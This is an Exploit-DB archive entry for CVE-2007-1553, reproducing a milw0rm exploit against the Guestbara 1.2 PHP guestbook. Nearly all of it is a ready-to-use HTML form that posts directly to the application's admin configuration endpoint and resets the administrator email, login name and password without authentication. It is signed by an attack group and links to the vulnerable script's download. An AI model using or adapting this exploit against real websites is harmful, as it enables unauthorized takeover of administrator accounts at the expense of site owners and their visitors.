Guestbara <= 1.2 Change Admin Login and Password Exploit

2007-03-18T00:00:00
ID EDB-ID:3506
Type exploitdb
Reporter Kacper
Modified 2007-03-18T00:00:00

Description

Guestbara <= 1.2 Change Admin Login and Password Exploit. CVE-2007-1553. Webapps exploit for php platform

                                        
                                            &lt;html&gt;
&lt;title&gt;Guestbara &lt;= 1.2 Change admin login & password exploit by Kacper&lt;/title&gt;
&lt;table border=0 cellspacing=0 cellpadding=0 align='center'&gt;

&lt;form method='post' action='http://127.0.0.1/guestbook_path/admin/configuration.php?action=saveconfig&zapis=ok'&gt;&lt;tr&gt;

&lt;tr&gt;&lt;td width=200&gt;Admin Email&lt;/td&gt;&lt;td&gt;&lt;input type='text' name='admin_mail' class='textfield' value=''&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td width=200&gt;Admin Name&lt;/td&gt;&lt;td&gt;&lt;input type='text' name='login' class='textfield' value=''&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td width=200&gt;Admin Pass&lt;/td&gt;&lt;td&gt;&lt;input type='password' name='pass' class='textfield' value=''&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td  colspan=2 align=center&gt;
  &lt;p&gt;
    &lt;input type='submit' name='submit' value='Zachowaj'&gt;
  &lt;/p&gt;
  &lt;p&gt;by Kacper  &lt;/p&gt;
  &lt;p&gt;for&lt;/p&gt;
  &lt;p&gt;&lt;a href="http://www.rahim.webd.pl/" target="_blank"&gt;DEVIL TEAM &lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/form&gt;&lt;/table&gt;
&lt;p&gt;&nbsp;&lt;/p&gt;
&lt;p align="center"&gt;script download: http://www.hotscripts.pl/produkt-3051.html&lt;/p&gt;
&lt;p align="center"&gt;Greetz @ll DEVIL TEAM &lt;/p&gt;
&lt;/html&gt;

# milw0rm.com [2007-03-18]